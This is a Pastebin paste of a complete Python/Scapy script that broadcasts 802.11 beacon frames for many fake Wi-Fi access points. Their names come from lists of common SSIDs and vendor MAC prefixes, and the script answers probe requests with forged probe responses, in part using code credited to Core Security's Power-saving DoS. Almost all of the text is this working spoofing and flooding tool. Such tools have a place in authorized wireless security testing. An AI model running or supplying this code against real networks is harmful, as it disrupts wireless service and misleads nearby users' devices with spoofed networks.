Advertisement
opexxx

fuzzap.py

May 31st, 2014
307
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 6.63 KB | None | 0 0
  1. '''
  2.    Copyright 2013 Brendan Scherer
  3.  
  4.    This program is free software: you can redistribute it and/or modify
  5.    it under the terms of the GNU General Public License as published by
  6.    the Free Software Foundation, either version 3 of the License, or
  7.    (at your option) any later version.
  8.  
  9.    This program is distributed in the hope that it will be useful,
  10.    but WITHOUT ANY WARRANTY; without even the implied warranty of
  11.    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
  12.    GNU General Public License for more details.
  13.  
  14.    You should have received a copy of the GNU General Public License
  15.    along with this program.  If not, see <http://www.gnu.org/licenses/>.
  16.  
  17.    Small portion of code was taken from Core Security Technologies' Power-saving DoS.
  18.    Their copyright follows, their code is marked below
  19.  
  20. #  Copyright (c) 2009 Core Security Technologies
  21. #
  22. #  Author: Leandro Meiners (lea@coresecurity.com)
  23. #
  24. #  Permission to use, copy, modify, and distribute this software for any
  25. #  purpose with or without fee is hereby granted, provided that the above
  26. #  copyright notice and this permission notice appear in all copies.
  27. #
  28. #  THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
  29. #  WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
  30. #  MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
  31. #  ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
  32. #  WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
  33. #  ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
  34. #  OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
  35.  
  36. The common SSID list was pulled from https://wigle.net/gps/gps/Stat
  37. The OUI vendor list was parsed from http://standards.ieee.org/develop/regauth/oui/oui.txt
  38. for well known vendors (netgear, cisco, linksys, d-link, atheros, ralink, apple)
  39.  
  40. '''
  41.  
  42. #!/usr/bin/python
  43.  
  44. import signal
  45. import sys
  46. import time
  47. import logging
  48. logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
  49. from scapy.config import *
  50. from scapy.layers.dot11 import *
  51. from scapy.utils import *
  52. import argparse
  53. import random
  54. from multiprocessing import Process
  55.  
  56. mlist = []
  57. sid = []
  58. ftime = time.time() * 1000000
  59. parser = argparse.ArgumentParser()
  60. parser.add_argument("interface", help="Specifies the interface in monitor mode to use")
  61. parser.add_argument("APs", help="Number of fake access points to create", type=int)
  62.  
  63. args = parser.parse_args()
  64. ifce = args.interface
  65. APs = args.APs
  66.  
  67. def uptime():
  68.         microtime = int(round(time.time() * 1000000)) - ftime
  69.         return microtime
  70.  
  71. def generate_mac():
  72.  
  73.     try:
  74.         #Grab a common OUI from file based off of the IEEE list at http://standards.ieee.org/develop/regauth/oui/oui.txt
  75.         mac = random.choice(open("common.txt").readlines())
  76.  
  77.     except IOError as ioe:
  78.         print "Cannot read common.txt. Does the file exist? Do you have permissions? {0}: {1}".format(ioe.errno, ioe.strerror)
  79.  
  80.     iter = 0
  81.  
  82.     # We have to create the last three bits of the mac address since we grabbed the first three from file
  83.     while iter < 3:
  84.  
  85.         #Generate a random integer between 0 and 255 to match the possible combinations for the MAC
  86.         ranint = random.randint(0,255)
  87.         int2 = 0
  88.  
  89.         #We have an exception in case the random integer is less than 16, as we would only get one character instead of two
  90.         if ranint < 16:
  91.            
  92.             int2 = random.randint(0,15)
  93.             mac += ":" + hex(ranint)[2:] + hex(int2)[2:]
  94.             iter += 1
  95.  
  96.         else:
  97.  
  98.             mac += ":" + hex(ranint)[2:]
  99.             iter += 1
  100.  
  101.     #When we return the mac, it has newlines due to reading from file. We need to strip those before we return the mac
  102.     return mac.replace("\n", "")
  103.  
  104. def beacon_frame(bssids,macaddrs,ifce):    
  105.     while True:
  106.         for n in range(len(bssids)):
  107.             sendp(RadioTap()/
  108.                 Dot11(addr1="ff:ff:ff:ff:ff:ff",
  109.                 addr2=macaddrs[n],
  110.                 addr3=macaddrs[n])/
  111.                 Dot11Beacon(cap="ESS", timestamp=uptime())/
  112.                 Dot11Elt(ID="SSID", info=bssids[n])/
  113.                 Dot11Elt(ID="Rates", info='\x82\x84\x0b\x16')/
  114.                 Dot11Elt(ID="DSset", info="\x03")/
  115.                 Dot11Elt(ID="TIM", info="\x00\x01\x00\x00"),
  116.                 iface=ifce, loop=0, verbose=False)
  117.         time.sleep(.102)
  118.  
  119. def load_vendor(num_of_aps):
  120.    
  121.     #Generate some mac addresses and shove them in a list
  122.     for n in range(num_of_aps):
  123.         mlist.append(generate_mac())
  124.  
  125. def load_ssid(num_of_aps):
  126.    
  127.     #Grab some random SSIDs from the wigle list and shove'm in a list
  128.     for n in range(num_of_aps):
  129.         sid.append(generate_ssid())
  130.  
  131. def generate_ssid():
  132.  
  133.     try:
  134.         #Pull a random SSID from a file with the top 1000 most common SSIDs from https://wigle.net/gps/gps/Stat
  135.    
  136.         ssid = random.choice(open("ssid.txt").readlines())
  137.  
  138.     except IOError as ioer:
  139.         print "Could not open ssid.txt. Does the file exist? Do you have the correct permissions? {0}: {1}".format(ioer.errno, ioer.strerror)
  140.  
  141.     #Return the SSID from file while stripping the new-line from the output
  142.     return ssid.replace("\n", "")
  143.  
  144. def probe_response(ssid, macs, rates, stamac, ifce):
  145.  
  146.     sendp(RadioTap(present=18479L)/
  147.         Dot11(addr2=macs, addr3=macs, addr1=stamac, FCfield=8L)/
  148.         Dot11ProbeResp(beacon_interval=102, cap=12548L, timestamp=uptime())/
  149.         Dot11Elt(info=ssid, ID=0)/
  150.         Dot11Elt(info=rates, ID=1)/
  151.         Dot11Elt(info='\x01', ID=3, len=1)/
  152.         Dot11Elt(info='\x00', ID=42, len=1)/
  153.         Dot11Elt(info='\x01\x00\x00\x0f\xac\x02\x02\x00\x00\x0f\xac\x02\x00\x0f\xac\x04\x01\x00\x00\x0f\xac\x02(\x00', ID=48, len=24)/
  154.         Dot11Elt(info='H`l', ID=50, len=3), iface=ifce, loop=0, verbose=False)
  155.  
  156. def sig_int(sigint, frame):
  157.     print("Shutting down....")
  158.     sys.exit(0)
  159.  
  160. def main():
  161.    
  162.     signal.signal(signal.SIGINT, sig_int)
  163.  
  164.     #load all of our MACs and SSIDs to spam
  165.     load_vendor(APs)
  166.     load_ssid(APs)
  167.    
  168.     #Fork out the beacon frames
  169.     Process(target=beacon_frame, args=(sid,mlist,ifce)).start()
  170.  
  171.     #Start sniffing for probe request from our previously forked out beacon frames, and grab the ssid, rates, and MAC they are referencing
  172.     while True:
  173.         ssid = None
  174.         rates = None
  175.         macs = None
  176.        
  177.         #start sniffing
  178.         p=sniff(iface=ifce, count=1)[0]
  179.        
  180.         #If the sniffed packet is a probe request and is sending it to one of our MAC addresses
  181.         if p.haslayer(Dot11ProbeReq) and p.addr1 in mlist:
  182.             pkt = p.getlayer(Dot11Elt)
  183.             macs = p.addr1
  184.  
  185.             # Start Core Security's code
  186.             while pkt:
  187.                 if pkt.ID == 0:
  188.  
  189.                     #ID 0's info portion of a 802.11 packet is the SSID, grab it
  190.                     ssid = pkt.info
  191.                 if pkt.ID == 1:
  192.  
  193.                     #ID 1's info portion of a 802.11 packet is the supported rates, grab it
  194.                     rates = pkt.info
  195.                 pkt = pkt.payload
  196.             #End Core Security's code
  197.  
  198.             probe_response(ssid, macs, rates, p.addr2, ifce)
  199.  
  200. main()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement